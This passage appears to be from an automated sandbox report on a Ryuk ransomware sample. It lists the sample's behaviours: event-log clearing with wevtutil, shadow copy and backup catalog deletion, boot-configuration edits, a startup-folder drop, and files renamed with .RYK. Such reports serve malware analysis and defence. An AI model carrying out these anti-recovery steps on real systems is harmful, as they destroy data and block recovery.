memory/1608-95-0x0000000000000000-mapping.dmp

memory/1496-96-0x0000000000000000-mapping.dmp

memory/1776-97-0x0000000000000000-mapping.dmp

memory/1376-98-0x0000000000000000-mapping.dmp

memory/1064-99-0x0000000000000000-mapping.dmp

memory/332-100-0x0000000000000000-mapping.dmp

memory/540-101-0x0000000000000000-mapping.dmp

memory/1700-102-0x0000000000000000-mapping.dmp

memory/1468-103-0x000007FEFC5A1000-0x000007FEFC5A3000-memory.dmp

memory/1968-104-0x0000000000000000-mapping.dmp

memory/844-105-0x0000000000000000-mapping.dmp

memory/696-106-0x0000000000000000-mapping.dmp

memory/592-107-0x0000000000000000-mapping.dmp

memory/1404-108-0x0000000000000000-mapping.dmp

memory/288-110-0x0000000000000000-mapping.dmp

memory/1620-113-0x0000000000000000-mapping.dmp

memory/840-112-0x0000000000000000-mapping.dmp

memory/1612-114-0x0000000000000000-mapping.dmp

memory/1420-119-0x0000000000000000-mapping.dmp

memory/1112-121-0x0000000000000000-mapping.dmp

memory/1680-118-0x0000000000000000-mapping.dmp

memory/988-123-0x0000000000000000-mapping.dmp

memory/772-122-0x0000000000000000-mapping.dmp

memory/1164-124-0x0000000000000000-mapping.dmp

memory/1728-125-0x0000000000000000-mapping.dmp

memory/1760-120-0x0000000000000000-mapping.dmp

memory/1708-116-0x0000000000000000-mapping.dmp

memory/524-117-0x0000000000000000-mapping.dmp

memory/1944-115-0x0000000000000000-mapping.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2022-11-10 06:20

Reported

2022-11-10 06:23

Platform

win10v2004-20220901-en

Max time kernel

150s

Max time network

153s

Command Line

"C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe"

Signatures

Ryuk

ransomware ryuk

Clears Windows event logs

evasion ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A

Deletes shadow copies

ransomware

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Deletes backup catalog

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\wbadmin.exe N/A

Disables Task Manager via registry modification

evasion

Disables taskbar notifications via registry modification

evasion

Disables use of System Restore points

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe C:\Windows\system32\attrib.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\F: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\f: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\h: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\D: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\g: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\F: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\D: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\e: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\f: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\h: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\e: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\g: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\fr-fr\ui-strings.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.zh_CN_5.5.0.165303.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\dark\x.cur.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogo.scale-180.png.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\GROOVEEX.DLL.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_folder-hover_32.svg.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\ui-strings.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\mk.pak.DATA.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019R_Trial-pl.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\TRANSLAT\FREN\WT61FR.LEX.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\tr-tr\ui-strings.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-settings.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN086.XML.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\msedge_100_percent.pak.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.console_5.5.0.165303\feature.properties.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\management-agent.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\SETLANG_COL.HXT.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sv-se\ui-strings.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\ja-jp\ui-strings.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\ur.pak.DATA.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\messages_fr.properties.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\license.html.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\da.pak.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\plugin.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\Close.png.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dummy.aff.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.swt.win32.win32.x86_64.nl_ja_4.4.0.v20140623020002.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\tr-tr\AppStore_icon.svg.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusE5R_SubTrial-pl.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\newgrounds.luac.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProfessionalR_Retail-ppd.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000042\catalog.json.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\MSOXMLMF.DLL.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\css\main.css.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\it.pak.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\triggerConstraints.exsd.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\MondoR_SubTest-ul-oob.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\vk_swiftshader_icd.json.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioStdO365R_SubTrial-pl.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_100_fdf5ce_1x400.png.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\pt-PT.pak.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\jsse.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\VBA\VBA6\VBE6EXT.OLB.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\LAYERS\THMBNAIL.PNG.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019XC2RVL_MAKC2R-ul-oob.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019VL_KMS_Client_AE-ppd.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\close_x.png.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\cs-cz\ui-strings.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Templates\1033\ChronologicalResume.dotx.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\tr-tr\ui-strings.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\ICE\PREVIEW.GIF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_Trial2-ppd.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019DemoR_BypassTrial180-ul-oob.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\offsym.ttf.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\digsig_icons.png.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Trust Protection Lists\Sigma\Staging.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\ECLIPSE_.SF.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.addons.swt_1.1.1.v20140903-0821.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\WINWORD.HXS.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\help.svg.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\MLModels\nexturl.ort.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-progress-ui_ja.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Personal2019R_Retail-ul-phn.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\lpklegal.txt.[[email protected]].RYKCRYPT C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A

Drops file in Windows directory

Description Indicator Process Target
